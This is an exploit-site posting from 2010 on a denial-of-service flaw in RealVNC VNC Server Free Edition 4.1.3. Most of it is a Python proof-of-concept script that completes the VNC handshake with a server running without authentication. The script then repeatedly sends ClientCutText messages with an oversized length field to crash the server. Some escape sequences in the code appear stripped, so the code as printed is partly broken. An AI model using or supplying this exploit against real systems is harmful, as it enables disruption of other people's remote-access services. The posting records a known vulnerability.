RealVNC VNC Server Free Edition 4.1.3 Denial of Service
Posted on 04 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>RealVNC VNC Server Free Edition 4.1.3 Denial of Service</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================================= RealVNC VNC Server Free Edition 4.1.3 Denial of Service ======================================================= #==================================================================================================# # # # $$$$$$$ $$ $$ $$ $$$$$$ # # $$ __$$ \__| $$ | $$ | $$ __$$ # # $$ | $$ |$$ $$$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$ | $$ / $$ | # # $$$$$$$ |$$ |$$ _____|$$ __$$ $$ __$$ $$ __$$ $$ __$$ $$ __$$ $$ | $$$$$$$$ | # # $$ __$$ $$ |$$$$$$ $$ / $$ |$$ | $$ |$$$$$$$$ |$$ | $$ |$$ / $$ |$$ | $$ __$$ | # # $$ | $$ |$$ | \____$$ $$ | $$ |$$ | $$ |$$ ____|$$ | $$ |$$ | $$ |$$ | $$ | $$ | # # $$$$$$$ |$$ |$$$$$$$ |$$$$$$$ |$$ | $$ |$$$$$$$ $$ | $$ |$$$$$$ |$$ | $$ | $$ | # # \_______/ \__|\_______/ $$ ____/ \__| \__| \_______|\__| \__| \______/ \__| \__| \__| # # $$ | # # $$ | Plastics Make It Possible # # \__| # # # #==================================================================================================# # # # Vulnerability............Denial-of-Service # # Software.................RealVNC VNC Server Free Edition 4.1.3 # # Download.................http://www.realvnc.com/products/free/4.1/download.html # #==================================================================================================# # # # ##Description## # # # # Sending a ClientCutText Message with a length of 0xFFFFFFFF crashes the server with the # # exception shown below. Note: while the vulnerability is present regardless of authentication, # # for the sake of simplicity this script only works on servers configured to run with no # # authentication. # # # # winvnc4.exe: The instruction at 0x425BE4 referenced memory at 0xFFFFFF00. The memory could not # # be written (0x00425BE4 -> FFFFFF00) # # # # # # ##Proof of Concept## # import sys, struct, socket host ='localhost' port = 5900 def crash_vnc_server(): try: while 1: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.settimeout(1.0) print 'Connected' try: b = s.recv(8192) print 'ProtocolVersion Received' s.send(b) print 'ProtocolVersion Sent' b = s.recv(8192) print 'Security Received' s.send('x01') print 'Security Sent' # Recv SecurityResult b = s.recv(8192) print 'SecurityResult Received' if (len(b) == 4 and b[0] == chr(0) and b[1] == chr(0) and b[2] == chr(0) and b[3] == chr(0)): print 'SecurityResult OK' else: print 'SecurityResult Failed. The server must be set ' 'to No Authentication for this to work, otherwise ' 'you 'll need to write the necessary client side ' 'authentication code yourself.' return s.send('x01') print 'ClientInit Sent' b = s.recv(8192) print 'ServerInit Received' text_len = 0xFFFFFF text_str = struct.pack('L', text_len) + 'xAA' * text_len while 1: s.send('x06x00x00x00' + text_str) print 'ClientCutText Sent' except Exception: print 'Connection closed' except Exception: print 'Couldn't connect' crash_vnc_server() # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-04]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
